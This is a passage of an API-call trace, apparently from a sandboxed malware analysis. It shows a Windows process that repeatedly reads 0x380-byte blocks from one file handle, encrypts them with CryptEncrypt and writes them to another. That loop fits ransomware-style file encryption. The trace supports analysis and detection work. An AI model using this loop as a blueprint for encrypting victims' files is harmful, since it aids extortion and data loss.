lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.830] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.831] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.832] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.833] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.834] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.835] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.836] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.837] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.838] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.838] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) 